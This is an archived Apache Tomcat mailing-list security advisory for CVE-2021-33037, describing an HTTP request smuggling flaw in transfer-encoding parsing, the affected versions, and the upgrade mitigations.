From announce-return-475-archive-asf-public=cust-asf.ponee.io@tomcat.apache.org Mon Jul 12 13:25:37 2021 Return-Path: X-Original-To: archive-asf-public@cust-asf.ponee.io Delivered-To: archive-asf-public@cust-asf.ponee.io Received: from mxout1-ec2-va.apache.org (mxout1-ec2-va.apache.org [3.227.148.255]) by mx-eu-01.ponee.io (Postfix) with ESMTPS id A858C180654 for ; Mon, 12 Jul 2021 15:25:37 +0200 (CEST) Received: from mail.apache.org (mailroute1-lw-us.apache.org [207.244.88.153]) by mxout1-ec2-va.apache.org (ASF Mail Server at mxout1-ec2-va.apache.org) with SMTP id C1FE644341 for ; Mon, 12 Jul 2021 13:12:26 +0000 (UTC) Received: (qmail 93432 invoked by uid 500); 12 Jul 2021 13:12:21 -0000 Mailing-List: contact announce-help@tomcat.apache.org; run by ezmlm Precedence: bulk List-Help: List-Unsubscribe: List-Post: List-Id: Reply-To: announce@tomcat.apache.org Delivered-To: mailing list announce@tomcat.apache.org Delivered-To: moderator for announce@tomcat.apache.org Received: (qmail 56249 invoked by uid 99); 12 Jul 2021 13:04:35 -0000 From: Mark Thomas Subject: [SECURITY] CVE-2021-33037 Apache Tomcat HTTP request smuggling To: Tomcat Users List Cc: "announce@tomcat.apache.org" , announce@apache.org, Tomcat Developers List Message-ID: Date: Mon, 12 Jul 2021 14:04:33 +0100 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Thunderbird/78.11.0 MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8; format=flowed Content-Language: en-GB Content-Transfer-Encoding: 7bit CVE-2021-33037 HTTP request smuggling Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Tomcat 10.0.0-M1 to 10.0.6 Apache Tomcat 9.0.0.M1 to 9.0.46 Apache Tomcat 8.5.0 to 8.5.66 Description: Apache Tomcat did not correctly parse the HTTP transfer-encoding request header in some circumstances leading to the possibility to request smuggling when used with a reverse proxy. Specifically: Tomcat incorrectly ignored the transfer-encoding header if the client declared it would only accept an HTTP/1.0 response; Tomcat honoured the identify encoding; and Tomcat did not ensure that, if present, the chunked encoding was the final encoding.

Mitigation: Users of the affected versions should apply one of the following mitigations: - Upgrade to Apache Tomcat 10.0.7 or later - Upgrade to Apache Tomcat 9.0.48 or later - Upgrade to Apache Tomcat 8.5.68 or later Note that issue was fixed in 9.0.47 and 8.5.67 but the release votes for those versions did not pass. History: 2021-07-12 Original advisory References: [1] https://tomcat.apache.org/security-10.html [2] https://tomcat.apache.org/security-9.html [3] https://tomcat.apache.org/security-8.html